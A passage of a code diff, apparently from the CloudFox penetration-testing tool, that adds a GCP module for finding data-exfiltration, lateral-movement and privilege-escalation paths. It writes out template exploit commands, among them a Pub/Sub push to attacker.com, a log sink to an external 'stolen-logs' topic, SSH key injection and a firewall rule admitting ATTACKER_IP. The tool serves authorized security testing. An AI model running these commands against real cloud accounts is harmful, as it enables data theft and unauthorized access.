func (m *WhoAmIModule) identifyPrivEscPathsFromCache(cache *gcpinternal.PrivescC } } -// identifyPrivEscPathsFromAnalysis runs fresh privesc analysis using privescService +// identifyPrivEscPathsFromAnalysis runs fresh privesc analysis using attackpathService func (m *WhoAmIModule) identifyPrivEscPathsFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { - // Use privescService for comprehensive privesc analysis - svc := privescservice.New() + // Use attackpathService for comprehensive privesc analysis + svc := attackpathservice.New() // Build project names map projectNames := make(map[string]string) @@ -791,8 +819,8 @@ func (m *WhoAmIModule) identifyPrivEscPathsFromAnalysis(ctx context.Context, rel } } - // Run combined privesc analysis (org, folder, project levels) - result, err := svc.CombinedPrivescAnalysis(ctx, m.ProjectIDs, projectNames) + // Run combined attack path analysis with "privesc" filter + result, err := svc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, projectNames, "privesc") if err != nil { gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not analyze privilege escalation paths") return @@ -802,7 +830,7 @@ func (m *WhoAmIModule) identifyPrivEscPathsFromAnalysis(ctx context.Context, rel return } - // Filter and convert privescservice.PrivescPath to whoami's PrivilegeEscalationPath format + // Filter and convert attackpathservice.AttackPath to whoami's PrivilegeEscalationPath format // Only include paths where the principal matches current identity or their groups for _, path := range result.AllPaths { // Check if this path's principal is relevant to the current identity @@ -824,9 +852,9 @@ func (m *WhoAmIModule) identifyPrivEscPathsFromAnalysis(ctx context.Context, rel } // isDangerousRole checks if a role is considered dangerous -// Uses the dangerous permissions list from privescService for consistency +// Uses the dangerous permissions list from attackpathService for consistency func isDangerousRole(role string) bool { - // Roles that directly map to dangerous permissions from privescService + // Roles that directly map to dangerous permissions from attackpathService dangerousRoles := []string{ // Owner/Editor - broad access "roles/owner", @@ -875,6 +903,235 @@ func isDangerousRole(role string) bool { return false } +// identifyDataExfilCapabilities identifies data exfiltration capabilities for the current identity +// Uses unified cache if available, otherwise runs attackpathService for comprehensive analysis +// Filters results to only show capabilities relevant to the current identity and their groups +func (m *WhoAmIModule) identifyDataExfilCapabilities(ctx context.Context, logger internal.Logger) { + // Build set of principals to filter for (current identity + groups) + relevantPrincipals := make(map[string]bool) + relevantPrincipals[m.Identity.Email] = true + relevantPrincipals[strings.ToLower(m.Identity.Email)] = true + if m.Identity.Type == "serviceAccount" { + relevantPrincipals["serviceAccount:"+m.Identity.Email] = true + relevantPrincipals["serviceAccount:"+strings.ToLower(m.Identity.Email)] = true + } else { + relevantPrincipals["user:"+m.Identity.Email] = true + relevantPrincipals["user:"+strings.ToLower(m.Identity.Email)] = true + } + for _, group := range m.Identity.Groups { + if group.Email != "" { + relevantPrincipals[group.Email] = true + relevantPrincipals[strings.ToLower(group.Email)] = true + relevantPrincipals["group:"+group.Email] = true + relevantPrincipals["group:"+strings.ToLower(group.Email)] = true + } + } + relevantPrincipals["allUsers"] = true + relevantPrincipals["allAuthenticatedUsers"] = true + + // Check if attack path cache is available from context (e.g., from all-checks run) + cache := gcpinternal.GetAttackPathCacheFromContext(ctx) + if cache != nil && cache.IsPopulated() { + logger.InfoM("Using cached exfil data", globals.GCP_WHOAMI_MODULE_NAME) + m.identifyDataExfilFromCache(cache, relevantPrincipals) + } else { + // No cache available, run fresh analysis + m.identifyDataExfilFromAnalysis(ctx, relevantPrincipals, logger) + } + + if len(m.DataExfilCapabilities) > 0 { + logger.InfoM(fmt.Sprintf("[EXFIL] Found %d data exfiltration capability(s)", len(m.DataExfilCapabilities)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyDataExfilFromCache extracts exfil capabilities from the cached data +func (m *WhoAmIModule) identifyDataExfilFromCache(cache *gcpinternal.AttackPathCache, relevantPrincipals map[string]bool) { + for principal := range relevantPrincipals { + hasExfil, methods := cache.HasExfil(principal) + if !hasExfil { + // Also check with principal format + hasExfil, methods = cache.HasAttackPathForPrincipal(principal, gcpinternal.AttackPathExfil) + } + if !hasExfil { + continue + } + + for _, method := range methods { + capability := DataExfilCapability{ + ProjectID: method.ScopeID, + Permission: method.Method, + Category: method.Category, + RiskLevel: method.RiskLevel, + Description: method.Target, + } + m.DataExfilCapabilities = append(m.DataExfilCapabilities, capability) + } + } +} + +// identifyDataExfilFromAnalysis runs fresh exfil analysis using attackpathService +func (m *WhoAmIModule) identifyDataExfilFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { + // Use attackpathService for comprehensive exfil analysis + attackSvc := attackpathservice.New() + + // Build project names map + projectNames := make(map[string]string) + for _, proj := range m.Identity.Projects { + if proj.DisplayName != "" { + projectNames[proj.ProjectID] = proj.DisplayName + } + } + + // Run combined attack path analysis for exfil (org, folder, project, resource levels) + result, err := attackSvc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, projectNames, "exfil") + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not analyze data exfiltration capabilities") + return + } + + if result == nil { + return + } + + // Filter and convert to DataExfilCapability format + // Only include paths where the principal matches current identity or their groups + for _, path := range result.AllPaths { + if !relevantPrincipals[path.Principal] && !relevantPrincipals[strings.ToLower(path.Principal)] { + continue + } + + // Determine project ID from scope + projectID := path.ProjectID + if projectID == "" { + // For org/folder level, show scope info instead + projectID = fmt.Sprintf("%s:%s", path.ScopeType, path.ScopeID) + } + + capability := DataExfilCapability{ + ProjectID: projectID, + Permission: path.Method, + Category: path.Category, + RiskLevel: path.RiskLevel, + Description: path.Description, + } + m.DataExfilCapabilities = append(m.DataExfilCapabilities, capability) + } +} + +// identifyLateralMoveCapabilities identifies lateral movement capabilities for the current identity +// Uses unified cache if available, otherwise runs attackpathService for comprehensive analysis +// Filters results to only show capabilities relevant to the current identity and their groups +func (m *WhoAmIModule) identifyLateralMoveCapabilities(ctx context.Context, logger internal.Logger) { + // Build set of principals to filter for (current identity + groups) + relevantPrincipals := make(map[string]bool) + relevantPrincipals[m.Identity.Email] = true + relevantPrincipals[strings.ToLower(m.Identity.Email)] = true + if m.Identity.Type == "serviceAccount" { + relevantPrincipals["serviceAccount:"+m.Identity.Email] = true + relevantPrincipals["serviceAccount:"+strings.ToLower(m.Identity.Email)] = true + } else { + relevantPrincipals["user:"+m.Identity.Email] = true + relevantPrincipals["user:"+strings.ToLower(m.Identity.Email)] = true + } + for _, group := range m.Identity.Groups { + if group.Email != "" { + relevantPrincipals[group.Email] = true + relevantPrincipals[strings.ToLower(group.Email)] = true + relevantPrincipals["group:"+group.Email] = true + relevantPrincipals["group:"+strings.ToLower(group.Email)] = true + } + } + relevantPrincipals["allUsers"] = true + relevantPrincipals["allAuthenticatedUsers"] = true + + // Check if attack path cache is available from context (e.g., from all-checks run) + cache := gcpinternal.GetAttackPathCacheFromContext(ctx) + if cache != nil && cache.IsPopulated() { + logger.InfoM("Using cached lateral data", globals.GCP_WHOAMI_MODULE_NAME) + m.identifyLateralFromCache(cache, relevantPrincipals) + } else { + // No cache available, run fresh analysis + m.identifyLateralFromAnalysis(ctx, relevantPrincipals, logger) + } + + if len(m.LateralMoveCapabilities) > 0 { + logger.InfoM(fmt.Sprintf("[LATERAL] Found %d lateral movement capability(s)", len(m.LateralMoveCapabilities)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyLateralFromCache extracts lateral movement capabilities from the cached data +func (m *WhoAmIModule) identifyLateralFromCache(cache *gcpinternal.AttackPathCache, relevantPrincipals map[string]bool) { + for principal := range relevantPrincipals { + hasLateral, methods := cache.HasLateral(principal) + if !hasLateral { + // Also check with principal format + hasLateral, methods = cache.HasAttackPathForPrincipal(principal, gcpinternal.AttackPathLateral) + } + if !hasLateral { + continue + } + + for _, method := range methods { + capability := LateralMoveCapability{ + ProjectID: method.ScopeID, + Permission: method.Method, + Category: method.Category, + RiskLevel: method.RiskLevel, + Description: method.Target, + } + m.LateralMoveCapabilities = append(m.LateralMoveCapabilities, capability) + } + } +} + +// identifyLateralFromAnalysis runs fresh lateral movement analysis using attackpathService +func (m *WhoAmIModule) identifyLateralFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { + // Use attackpathService for comprehensive lateral movement analysis + attackSvc := attackpathservice.New() + + // Build project names map + projectNames := make(map[string]string) + for _, proj := range m.Identity.Projects { + if proj.DisplayName != "" { + projectNames[proj.ProjectID] = proj.DisplayName + } + } + + // Run combined attack path analysis for lateral movement (org, folder, project, resource levels) + result, err := attackSvc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, projectNames, "lateral") + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not analyze lateral movement capabilities") + return + } + + if result == nil { + return + } + + // Filter and convert to LateralMoveCapability format + // Only include paths where the principal matches current identity or their groups + for _, path := range result.AllPaths { + if !relevantPrincipals[path.Principal] && !relevantPrincipals[strings.ToLower(path.Principal)] { + continue + } + + // Determine project ID from scope + projectID := path.ProjectID + if projectID == "" { + // For org/folder level, show scope info instead + projectID = fmt.Sprintf("%s:%s", path.ScopeType, path.ScopeID) + } + + capability := LateralMoveCapability{ + ProjectID: projectID, + Permission: path.Method, + Category: path.Category, + RiskLevel: path.RiskLevel, + Description: path.Description, + } + m.LateralMoveCapabilities = append(m.LateralMoveCapabilities, capability) + } +} // ------------------------------ // Loot File Management @@ -893,6 +1150,14 @@ func (m *WhoAmIModule) initializeLootFiles() { Name: "whoami-privesc", Contents: "# Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", } + m.LootMap["whoami-data-exfil"] = &internal.LootFile{ + Name: "whoami-data-exfil", + Contents: "# Data Exfiltration Capabilities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } + m.LootMap["whoami-lateral-movement"] = &internal.LootFile{ + Name: "whoami-lateral-movement", + Contents: "# Lateral Movement Capabilities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } } } @@ -949,6 +1214,90 @@ func (m *WhoAmIModule) generateLoot() { path.Command, ) } + + // Data exfiltration capabilities loot + for _, cap := range m.DataExfilCapabilities { + m.LootMap["whoami-data-exfil"].Contents += fmt.Sprintf( + "## %s\n"+ + "# Category: %s\n"+ + "# Project: %s\n"+ + "# Description: %s\n"+ + "%s\n\n", + cap.Permission, + cap.Category, + cap.ProjectID, + cap.Description, + generateExfilExploitCmd(cap.Permission, cap.ProjectID), + ) + } + + // Lateral movement capabilities loot + for _, cap := range m.LateralMoveCapabilities { + m.LootMap["whoami-lateral-movement"].Contents += fmt.Sprintf( + "## %s\n"+ + "# Category: %s\n"+ + "# Project: %s\n"+ + "# Description: %s\n"+ + "%s\n\n", + cap.Permission, + cap.Category, + cap.ProjectID, + cap.Description, + generateLateralExploitCmd(cap.Permission, cap.ProjectID), + ) + } + } +} + +// generateExfilExploitCmd generates an exploit command for a data exfil permission +func generateExfilExploitCmd(permission, projectID string) string { + switch permission { + case "compute.images.create": + return fmt.Sprintf("gcloud compute images create exfil-image --source-disk=DISK_NAME --source-disk-zone=ZONE --project=%s", projectID) + case "compute.snapshots.create": + return fmt.Sprintf("gcloud compute snapshots create exfil-snapshot --source-disk=DISK_NAME --source-disk-zone=ZONE --project=%s", projectID) + case "logging.sinks.create": + return fmt.Sprintf("gcloud logging sinks create exfil-sink pubsub.googleapis.com/projects/EXTERNAL_PROJECT/topics/stolen-logs --project=%s", projectID) + case "cloudsql.instances.export": + return fmt.Sprintf("gcloud sql export sql INSTANCE_NAME gs://BUCKET/export.sql --database=DB_NAME --project=%s", projectID) + case "pubsub.subscriptions.create": + return fmt.Sprintf("gcloud pubsub subscriptions create exfil-sub --topic=TOPIC_NAME --push-endpoint=https://attacker.com/collect --project=%s", projectID) + case "bigquery.tables.export": + return fmt.Sprintf("bq extract --destination_format=CSV '%s:DATASET.TABLE' gs://BUCKET/export.csv", projectID) + case "storagetransfer.jobs.create": + return fmt.Sprintf("gcloud transfer jobs create gs://SOURCE_BUCKET s3://DEST_BUCKET --project=%s", projectID) + case "secretmanager.versions.access": + return fmt.Sprintf("gcloud secrets versions access latest --secret=SECRET_NAME --project=%s", projectID) + case "storage.objects.get": + return fmt.Sprintf("gsutil cp gs://BUCKET/OBJECT ./local-file --project=%s", projectID) + default: + return fmt.Sprintf("# Permission: %s - Refer to GCP documentation", permission) + } +} + +// generateLateralExploitCmd generates an exploit command for a lateral movement permission +func generateLateralExploitCmd(permission, projectID string) string { + switch permission { + case "compute.networks.addPeering": + return fmt.Sprintf("gcloud compute networks peerings create lateral-peering --network=NETWORK_NAME --peer-network=projects/TARGET_PROJECT/global/networks/TARGET_NETWORK --project=%s", projectID) + case "compute.instances.osLogin": + return fmt.Sprintf("gcloud compute ssh INSTANCE_NAME --zone=ZONE --project=%s", projectID) + case "compute.instances.osAdminLogin": + return fmt.Sprintf("gcloud compute ssh INSTANCE_NAME --zone=ZONE --project=%s # Then: sudo su", projectID) + case "compute.instances.setMetadata": + return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE_NAME --zone=ZONE --metadata=ssh-keys=\"user:$(cat ~/.ssh/id_rsa.pub)\" --project=%s", projectID) + case "compute.projects.setCommonInstanceMetadata": + return fmt.Sprintf("gcloud compute project-info add-metadata --metadata=ssh-keys=\"user:$(cat ~/.ssh/id_rsa.pub)\" --project=%s", projectID) + case "container.clusters.getCredentials": + return fmt.Sprintf("gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE --project=%s", projectID) + case "container.pods.exec": + return "kubectl exec -it POD_NAME -- /bin/sh" + case "compute.firewalls.create": + return fmt.Sprintf("gcloud compute firewall-rules create allow-lateral --network=NETWORK_NAME --allow=tcp:22,tcp:3389 --source-ranges=ATTACKER_IP/32 --project=%s", projectID) + case "iap.tunnelInstances.accessViaIAP": + return fmt.Sprintf("gcloud compute start-iap-tunnel INSTANCE_NAME PORT --zone=ZONE --project=%s", projectID) + default: + return fmt.Sprintf("# Permission: %s - Refer to GCP documentation", permission) } } @@ -1199,6 +1548,58 @@ func (m *WhoAmIModule) buildTables() []internal.TableFile { Body: privescBody, }) } + + // Data exfiltration capabilities table + if len(m.DataExfilCapabilities) > 0 { + exfilHeader := []string{ + "Project ID", + "Permission", + "Category", + "Description", + } + + var exfilBody [][]string + for _, cap := range m.DataExfilCapabilities { + exfilBody = append(exfilBody, []string{ + cap.ProjectID, + cap.Permission, + cap.Category, + cap.Description, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "whoami-data-exfil", + Header: exfilHeader, + Body: exfilBody, + }) + } + + // Lateral movement capabilities table + if len(m.LateralMoveCapabilities) > 0 { + lateralHeader := []string{ + "Project ID", + "Permission", + "Category", + "Description", + } + + var lateralBody [][]string + for _, cap := range m.LateralMoveCapabilities { + lateralBody = append(lateralBody, []string{ + cap.ProjectID, + cap.Permission, + cap.Category, + cap.Description, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "whoami-lateral-movement", + Header: lateralHeader, + Body: lateralBody, + }) + } } return tables diff --git a/gcp/services/attackpathService/attackpathService.go b/gcp/services/attackpathService/attackpathService.go new file mode 100644 index 00000000..b24fed40 --- /dev/null +++ b/gcp/services/attackpathService/attackpathService.go @@ -0,0 +1,1063 @@ +package attackpathservice + +import ( + "context" + "fmt" + "strings" + + iampb "cloud.google.com/go/iam/apiv1/iampb" + resourcemanager "cloud.google.com/go/resourcemanager/apiv3" + resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + crmv1 "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iam/v1" + "google.golang.org/api/iterator" + + // Resource-level IAM + "google.golang.org/api/bigquery/v2" + "google.golang.org/api/compute/v1" + "google.golang.org/api/storage/v1" +) + +var logger = internal.NewLogger() + +// AttackPathService provides analysis for data exfiltration and lateral movement paths +type AttackPathService struct { + session *gcpinternal.SafeSession +} + +func New() *AttackPathService { + return &AttackPathService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *AttackPathService { + return &AttackPathService{session: session} +} + +// DataExfilPermission represents a permission that enables data exfiltration +type DataExfilPermission struct { + Permission string `json:"permission"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` +} + +// LateralMovementPermission represents a permission that enables lateral movement +type LateralMovementPermission struct { + Permission string `json:"permission"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` +} + +// PrivescPermission represents a permission that enables privilege escalation +type PrivescPermission struct { + Permission string `json:"permission"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` +} + +// AttackPath represents an attack path (exfil, lateral, or privesc) +type AttackPath struct { + Principal string `json:"principal"` + PrincipalType string `json:"principalType"` + Method string `json:"method"` + TargetResource string `json:"targetResource"` + Permissions []string `json:"permissions"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` + ExploitCommand string `json:"exploitCommand"` + ProjectID string `json:"projectId"` + ScopeType string `json:"scopeType"` // organization, folder, project, resource + ScopeID string `json:"scopeId"` + ScopeName string `json:"scopeName"` + PathType string `json:"pathType"` // "exfil", "lateral", or "privesc" +} + +// CombinedAttackPathData holds all attack paths across org/folder/project/resource levels +type CombinedAttackPathData struct { + OrgPaths []AttackPath `json:"orgPaths"` + FolderPaths []AttackPath `json:"folderPaths"` + ProjectPaths []AttackPath `json:"projectPaths"` + ResourcePaths []AttackPath `json:"resourcePaths"` + AllPaths []AttackPath `json:"allPaths"` + OrgNames map[string]string `json:"orgNames"` + FolderNames map[string]string `json:"folderNames"` + OrgIDs []string `json:"orgIds"` +} + +// GetDataExfilPermissions returns permissions that enable data exfiltration +func GetDataExfilPermissions() []DataExfilPermission { + return []DataExfilPermission{ + // Compute Exports + {Permission: "compute.images.create", Category: "Compute Export", RiskLevel: "HIGH", Description: "Create VM images from disks for external export"}, + {Permission: "compute.snapshots.create", Category: "Compute Export", RiskLevel: "HIGH", Description: "Create disk snapshots for external export"}, + {Permission: "compute.disks.createSnapshot", Category: "Compute Export", RiskLevel: "HIGH", Description: "Create snapshots from specific disks"}, + {Permission: "compute.machineImages.create", Category: "Compute Export", RiskLevel: "HIGH", Description: "Create machine images including disk data"}, + + // Logging Sinks + {Permission: "logging.sinks.create", Category: "Logging", RiskLevel: "HIGH", Description: "Create logging sinks to export logs externally"}, + {Permission: "logging.sinks.update", Category: "Logging", RiskLevel: "HIGH", Description: "Modify logging sinks to redirect to external destinations"}, + + // Cloud SQL + {Permission: "cloudsql.backups.create", Category: "Database", RiskLevel: "HIGH", Description: "Create Cloud SQL backups for export"}, + {Permission: "cloudsql.instances.export", Category: "Database", RiskLevel: "CRITICAL", Description: "Export Cloud SQL data to GCS"}, + + // Pub/Sub + {Permission: "pubsub.subscriptions.create", Category: "Messaging", RiskLevel: "HIGH", Description: "Create subscriptions to intercept messages"}, + {Permission: "pubsub.subscriptions.consume", Category: "Messaging", RiskLevel: "MEDIUM", Description: "Pull messages from subscriptions"}, + {Permission: "pubsub.subscriptions.update", Category: "Messaging", RiskLevel: "HIGH", Description: "Modify subscription push endpoints"}, + + // BigQuery + {Permission: "bigquery.tables.export", Category: "BigQuery", RiskLevel: "CRITICAL", Description: "Export BigQuery tables to GCS"}, + {Permission: "bigquery.tables.getData", Category: "BigQuery", RiskLevel: "HIGH", Description: "Read data from BigQuery tables"}, + {Permission: "bigquery.jobs.create", Category: "BigQuery", RiskLevel: "MEDIUM", Description: "Run queries and extract data"}, + + // Storage + {Permission: "storage.objects.get", Category: "Storage", RiskLevel: "HIGH", Description: "Download objects from GCS buckets"}, + {Permission: "storage.objects.list", Category: "Storage", RiskLevel: "MEDIUM", Description: "List objects to identify sensitive data"}, + + // Storage Transfer + {Permission: "storagetransfer.jobs.create", Category: "Storage Transfer", RiskLevel: "CRITICAL", Description: "Create transfer jobs to external clouds"}, + {Permission: "storagetransfer.jobs.update", Category: "Storage Transfer", RiskLevel: "HIGH", Description: "Modify transfer jobs to external destinations"}, + + // Spanner + {Permission: "spanner.databases.export", Category: "Database", RiskLevel: "CRITICAL", Description: "Export Spanner databases to GCS"}, + {Permission: "spanner.databases.read", Category: "Database", RiskLevel: "HIGH", Description: "Read data from Spanner databases"}, + + // Firestore/Datastore + {Permission: "datastore.databases.export", Category: "Database", RiskLevel: "CRITICAL", Description: "Export Firestore/Datastore data to GCS"}, + {Permission: "datastore.entities.get", Category: "Database", RiskLevel: "HIGH", Description: "Read Firestore/Datastore entities"}, + + // Bigtable + {Permission: "bigtable.tables.readRows", Category: "Database", RiskLevel: "HIGH", Description: "Read data from Bigtable tables"}, + + // Secrets + {Permission: "secretmanager.versions.access", Category: "Secrets", RiskLevel: "CRITICAL", Description: "Access secret values (API keys, credentials)"}, + + // KMS + {Permission: "cloudkms.cryptoKeyVersions.useToDecrypt", Category: "Encryption", RiskLevel: "HIGH", Description: "Decrypt encrypted data for exfiltration"}, + } +} + +// GetLateralMovementPermissions returns permissions that enable lateral movement +func GetLateralMovementPermissions() []LateralMovementPermission { + return []LateralMovementPermission{ + // VPC Peering + {Permission: "compute.networks.addPeering", Category: "Network", RiskLevel: "CRITICAL", Description: "Create VPC peering to access resources in other projects"}, + {Permission: "compute.networks.updatePeering", Category: "Network", RiskLevel: "HIGH", Description: "Modify VPC peering configurations"}, + {Permission: "compute.networks.removePeering", Category: "Network", RiskLevel: "MEDIUM", Description: "Remove VPC peering (disruptive)"}, + + // Service Networking + {Permission: "servicenetworking.services.addPeering", Category: "Network", RiskLevel: "HIGH", Description: "Enable private service access to shared networks"}, + + // Shared VPC + {Permission: "compute.subnetworks.use", Category: "Shared VPC", RiskLevel: "HIGH", Description: "Use shared VPC subnets in other projects"}, + {Permission: "compute.subnetworks.setPrivateIpGoogleAccess", Category: "Shared VPC", RiskLevel: "MEDIUM", Description: "Modify private Google access settings"}, + + // Image/Snapshot IAM + {Permission: "compute.images.setIamPolicy", Category: "Compute Sharing", RiskLevel: "HIGH", Description: "Share VM images with external projects"}, + {Permission: "compute.snapshots.setIamPolicy", Category: "Compute Sharing", RiskLevel: "HIGH", Description: "Share disk snapshots with external projects"}, + {Permission: "compute.machineImages.setIamPolicy", Category: "Compute Sharing", RiskLevel: "HIGH", Description: "Share machine images with external projects"}, + + // SA Impersonation + {Permission: "iam.serviceAccounts.getAccessToken", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Generate tokens for SAs in other projects"}, + {Permission: "iam.serviceAccounts.signBlob", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign as SAs in other projects"}, + + // GKE + {Permission: "container.clusters.getCredentials", Category: "GKE", RiskLevel: "HIGH", Description: "Get credentials for GKE clusters"}, + {Permission: "container.pods.exec", Category: "GKE", RiskLevel: "HIGH", Description: "Execute commands in pods"}, + {Permission: "container.pods.portForward", Category: "GKE", RiskLevel: "HIGH", Description: "Port forward to pods"}, + + // Compute Access + {Permission: "compute.instances.osLogin", Category: "Compute Access", RiskLevel: "HIGH", Description: "SSH into instances via OS Login"}, + {Permission: "compute.instances.osAdminLogin", Category: "Compute Access", RiskLevel: "CRITICAL", Description: "SSH with sudo via OS Login"}, + {Permission: "compute.instances.setMetadata", Category: "Compute Access", RiskLevel: "HIGH", Description: "Add SSH keys via metadata"}, + {Permission: "compute.projects.setCommonInstanceMetadata", Category: "Compute Access", RiskLevel: "CRITICAL", Description: "Add SSH keys project-wide"}, + + // Cloud SQL + {Permission: "cloudsql.instances.connect", Category: "Database Access", RiskLevel: "HIGH", Description: "Connect to Cloud SQL instances"}, + {Permission: "cloudsql.users.create", Category: "Database Access", RiskLevel: "HIGH", Description: "Create database users"}, + + // VPN/Interconnect + {Permission: "compute.vpnTunnels.create", Category: "Network", RiskLevel: "HIGH", Description: "Create VPN tunnels to external networks"}, + {Permission: "compute.interconnects.create", Category: "Network", RiskLevel: "CRITICAL", Description: "Create dedicated interconnects"}, + {Permission: "compute.routers.update", Category: "Network", RiskLevel: "HIGH", Description: "Modify Cloud Router for traffic redirection"}, + + // Firewall + {Permission: "compute.firewalls.create", Category: "Network", RiskLevel: "HIGH", Description: "Create firewall rules to allow access"}, + {Permission: "compute.firewalls.update", Category: "Network", RiskLevel: "HIGH", Description: "Modify firewall rules to allow access"}, + {Permission: "compute.securityPolicies.update", Category: "Network", RiskLevel: "HIGH", Description: "Modify Cloud Armor policies"}, + + // IAP + {Permission: "iap.tunnelInstances.accessViaIAP", Category: "Network", RiskLevel: "MEDIUM", Description: "Access instances via IAP tunnel"}, + {Permission: "iap.tunnelDestGroups.accessViaIAP", Category: "Network", RiskLevel: "MEDIUM", Description: "Access resources via IAP tunnel"}, + } +} + +// GetPrivescPermissions returns permissions that enable privilege escalation +func GetPrivescPermissions() []PrivescPermission { + return []PrivescPermission{ + // Service Account Impersonation - CRITICAL + {Permission: "iam.serviceAccounts.getAccessToken", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Generate access tokens for any SA"}, + {Permission: "iam.serviceAccounts.signBlob", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign blobs as SA (GCS signed URLs)"}, + {Permission: "iam.serviceAccounts.signJwt", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign JWTs as SA (impersonation)"}, + {Permission: "iam.serviceAccounts.implicitDelegation", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Delegate SA identity to others"}, + {Permission: "iam.serviceAccounts.getOpenIdToken", Category: "SA Impersonation", RiskLevel: "HIGH", Description: "Generate OIDC tokens for SA"}, + + // Key Creation - CRITICAL + {Permission: "iam.serviceAccountKeys.create", Category: "Key Creation", RiskLevel: "CRITICAL", Description: "Create persistent SA keys"}, + {Permission: "storage.hmacKeys.create", Category: "Key Creation", RiskLevel: "HIGH", Description: "Create HMAC keys for S3-compatible access"}, + + // IAM Modification - CRITICAL + {Permission: "resourcemanager.projects.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify project-level IAM policy"}, + {Permission: "resourcemanager.folders.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify folder-level IAM policy"}, + {Permission: "resourcemanager.organizations.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify org-level IAM policy"}, + {Permission: "iam.serviceAccounts.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Grant access to service accounts"}, + {Permission: "iam.roles.update", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify custom role permissions"}, + {Permission: "iam.roles.create", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Create new custom roles"}, + + // Resource-specific IAM Modification - HIGH + {Permission: "pubsub.topics.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify Pub/Sub topic IAM policy"}, + {Permission: "pubsub.subscriptions.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify Pub/Sub subscription IAM policy"}, + {Permission: "bigquery.datasets.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify BigQuery dataset IAM policy"}, + {Permission: "artifactregistry.repositories.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify Artifact Registry IAM policy"}, + {Permission: "compute.instances.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify Compute instance IAM policy"}, + + // Compute Access - HIGH + {Permission: "compute.instances.create", Category: "Compute", RiskLevel: "HIGH", Description: "Create compute instances with SA"}, + {Permission: "compute.instances.setMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify instance metadata (SSH keys, startup scripts)"}, + {Permission: "compute.instances.setServiceAccount", Category: "Compute", RiskLevel: "HIGH", Description: "Change instance service account"}, + {Permission: "compute.projects.setCommonInstanceMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify project-wide metadata"}, + {Permission: "compute.instances.osLogin", Category: "Compute", RiskLevel: "MEDIUM", Description: "SSH into instances via OS Login"}, + {Permission: "compute.instances.osAdminLogin", Category: "Compute", RiskLevel: "HIGH", Description: "SSH with sudo via OS Login"}, + + // Cloud Functions - HIGH + {Permission: "cloudfunctions.functions.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy functions with SA identity"}, + {Permission: "cloudfunctions.functions.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function code/SA"}, + {Permission: "cloudfunctions.functions.sourceCodeSet", Category: "Serverless", RiskLevel: "HIGH", Description: "Change function source code"}, + {Permission: "cloudfunctions.functions.setIamPolicy", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function IAM policy (make public)"}, + + // Cloud Run - HIGH + {Permission: "run.services.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy services with SA identity"}, + {Permission: "run.services.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service code/SA"}, + {Permission: "run.services.setIamPolicy", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service IAM policy (make public)"}, + {Permission: "run.jobs.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Create Cloud Run jobs with SA identity"}, + {Permission: "run.jobs.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify Cloud Run job code/SA"}, + + // Data Processing - HIGH + {Permission: "dataproc.clusters.create", Category: "Data Processing", RiskLevel: "HIGH", Description: "Create Dataproc clusters with SA identity"}, + {Permission: "dataproc.jobs.create", Category: "Data Processing", RiskLevel: "HIGH", Description: "Submit jobs to Dataproc clusters"}, + {Permission: "dataflow.jobs.create", Category: "Data Processing", RiskLevel: "HIGH", Description: "Create Dataflow jobs with SA 